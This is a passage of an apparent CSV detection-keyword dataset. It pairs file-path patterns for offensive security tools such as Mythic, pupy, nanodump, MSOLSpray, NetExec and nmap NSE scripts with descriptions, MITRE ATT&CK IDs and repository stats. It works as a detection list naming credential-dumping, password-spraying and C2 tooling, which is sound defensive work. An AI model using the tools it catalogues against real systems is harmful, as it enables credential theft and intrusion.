TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" +"*/msi_search.ps1*","offensive_tool_keyword","msi-search","This tool simplifies the task for red team operators and security teams to identify which MSI files correspond to which software and enables them to download the relevant file to investigate local privilege escalation vulnerabilities through MSI repairs","T1005 ","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/mandiant/msi-search","1","1","N/A","10","2","158","15","2023-07-20T18:12:49Z","2023-06-29T18:31:56Z" +"*/msi-search.git*","offensive_tool_keyword","msi-search","This tool simplifies the task for red team operators and security teams to identify which MSI files correspond to which software and enables them to download the relevant file to investigate local privilege escalation vulnerabilities through MSI repairs","T1005 ","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/mandiant/msi-search","1","1","N/A","10","2","158","15","2023-07-20T18:12:49Z","2023-06-29T18:31:56Z" +"*/msLDAPDump*","offensive_tool_keyword","msldapdump","LDAP enumeration tool implemented in Python3","T1018 - T1210.001","TA0007 - TA0001","N/A","N/A","Reconnaissance","https://github.com/dievus/msLDAPDump","1","1","N/A","N/A","3","205","27","2023-08-14T13:15:29Z","2022-12-30T23:35:40Z" +"*/msol.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*/MSOLSpray*","offensive_tool_keyword","MSOLSpray","This module will perform password spraying against Microsoft Online accounts (Azure/O365)","T1110.003 - T1553.003","TA0001 - TA0006","N/A","N/A","Network Exploitation tools","https://github.com/dafthack/MSOLSpray","1","1","N/A","10","8","735","147","2023-02-17T13:52:21Z","2020-03-16T13:38:22Z" +"*/msrpc-enum.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/mssql_priv.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*/ms-sql-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/ms-sql-config.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/ms-sql-dac.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/ms-sql-dump-hashes.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/ms-sql-empty-password.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/mssqlexec.py*","offensive_tool_keyword","crackmapexec","protocol scripts from crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"*/ms-sql-hasdbaccess.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/ms-sql-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/ms-sql-ntlm-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/mssqlproxy.git*","offensive_tool_keyword","mssqlproxy","mssqlproxy is a toolkit aimed to perform lateral movement in restricted environments through a compromised Microsoft SQL Server via socket reuse","T1021.002 - T1071.001 - T1573.002","TA0008 - TA0011","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/blackarrowsec/mssqlproxy","1","1","N/A","10","7","682","113","2021-02-16T20:13:04Z","2020-02-12T08:44:28Z" +"*/ms-sql-query.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/ms-sql-tables.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/ms-sql-xp-cmdshell.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/mtrace.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/MultiPotato.git*","offensive_tool_keyword","MultiPotato","get SYSTEM via SeImpersonate privileges","T1548.002 - T1134.002","TA0004 - TA0006","N/A","N/A","Privilege Escalation","https://github.com/S3cur3Th1sSh1t/MultiPotato","1","1","N/A","10","5","485","87","2021-11-20T16:20:23Z","2021-11-19T15:50:55Z" +"*/murmur-version.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/mushishi.h*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/mysql-audit.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/mysql-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/mysql-databases.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/mysql-dump-hashes.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/mysql-empty-password.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/mysql-enum.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/mysql-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/mysql-query.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/mysql-users.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/mysql-variables.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/mysql-vuln-cve2012-2122.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/Mystikal.git*","offensive_tool_keyword","Mystikal","macOS Initial Access Payload Generator","T1059.005 - T1204.002 - T1566.001","TA0002 - TA0001","N/A","N/A","Exploitation tools","https://github.com/D00MFist/Mystikal","1","1","N/A","9","3","245","35","2023-05-10T15:21:26Z","2021-05-03T14:46:16Z" +"*/mystikal.py*","offensive_tool_keyword","Mystikal","macOS Initial Access Payload Generator","T1059.005 - T1204.002 - T1566.001","TA0002 - TA0001","N/A","N/A","Exploitation tools","https://github.com/D00MFist/Mystikal","1","1","N/A","9","3","245","35","2023-05-10T15:21:26Z","2021-05-03T14:46:16Z" +"*/Mythic/mythic*","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003","N/A","N/A","C2","https://github.com/its-a-feature/Mythic","1","1","N/A","10","10","2492","383","2023-10-04T15:37:48Z","2018-07-05T02:09:59Z" +"*/Mythic_CLI*","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003","N/A","N/A","C2","https://github.com/its-a-feature/Mythic","1","1","N/A","10","10","2492","383","2023-10-04T15:37:48Z","2018-07-05T02:09:59Z" +"*/MythicAgents/*","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003","N/A","N/A","C2","https://github.com/its-a-feature/Mythic","1","1","N/A","10","10","2492","383","2023-10-04T15:37:48Z","2018-07-05T02:09:59Z" +"*/MythicAgents/*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","137","32","2023-10-04T12:36:29Z","2022-01-24T20:44:38Z" +"*/MythicC2Profiles/*","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003","N/A","N/A","C2","https://github.com/its-a-feature/Mythic","1","1","N/A","10","10","2492","383","2023-10-04T15:37:48Z","2018-07-05T02:09:59Z" +"*/mythic-cli*","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003","N/A","N/A","C2","https://github.com/its-a-feature/Mythic","1","1","N/A","10","10","2492","383","2023-10-04T15:37:48Z","2018-07-05T02:09:59Z" +"*/MythicConfig.cs*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","137","32","2023-10-04T12:36:29Z","2022-01-24T20:44:38Z" +"*/mythic-react-docker*","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003","N/A","N/A","C2","https://github.com/its-a-feature/Mythic","1","1","N/A","10","10","2492","383","2023-10-04T15:37:48Z","2018-07-05T02:09:59Z" +"*/mzet-/les-res*","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","0","N/A","10","10","4725","1055","2023-08-18T17:29:23Z","2016-10-06T21:55:51Z" +"*/n1nj4sec/pupy*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"*/nanodump*","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","1467","208","2023-09-04T01:25:27Z","2021-11-10T18:28:15Z" +"*/nanodump.*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z" +"*/nanodump.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*/nanorobeus.git*","offensive_tool_keyword","nanorobeus","COFF file (BOF) for managing Kerberos tickets.","T1558.003 - T1208","TA0006 - TA0007","N/A","N/A","C2","https://github.com/wavvs/nanorobeus","1","1","N/A","10","10","234","28","2023-07-02T12:56:27Z","2022-07-04T00:33:30Z" +"*/nanorubeus/*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","137","32","2023-10-04T12:36:29Z","2022-01-24T20:44:38Z" +"*/Native/SigFlip/*","offensive_tool_keyword","cobaltstrike","SigFlip is a tool for patching authenticode signed PE files (exe. dll. sys ..etc) without invalidating or breaking the existing signature.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/med0x2e/SigFlip","1","1","N/A","10","10","885","165","2023-08-27T18:27:50Z","2021-08-08T15:59:19Z" +"*/nat-pmp-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/nat-pmp-mapport.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/nbd-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/nbns-interfaces.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/nbstat.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/NBTNS.py*","offensive_tool_keyword","responder","LLMNR. NBT-NS and MDNS poisoner","T1557.001 - T1171 - T1547.011","TA0011 - TA0005 - TA0003","N/A","N/A","Sniffing & Spoofing","https://github.com/SpiderLabs/Responder","1","1","N/A","N/A","10","4199","1633","2020-06-15T18:07:44Z","2012-10-24T14:35:12Z" +"*/nccgroup/nccfsas/*","offensive_tool_keyword","cobaltstrike","Information released publicly by NCC Group's Full Spectrum Attack Simulation (FSAS) team","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/nccgroup/nccfsas","1","1","N/A","10","10","594","117","2022-08-05T16:25:42Z","2020-06-25T09:33:45Z" +"*/ncp-enum-users.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/ncp-serverinfo.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/ncrack-*","offensive_tool_keyword","ncrack","High-speed network authentication cracking tool.","T1110.001 - T1110.002 - T1110.003","TA0006 - TA0007 - TA0009","N/A","N/A","Credential Access","https://github.com/nmap/ncrack","1","0","N/A","N/A","10","972","238","2023-02-22T21:33:24Z","2015-12-21T23:48:00Z" +"*/ncrack.git*","offensive_tool_keyword","ncrack","High-speed network authentication cracking tool.","T1110.001 - T1110.002 - T1110.003","TA0006 - TA0007 - TA0009","N/A","N/A","Credential 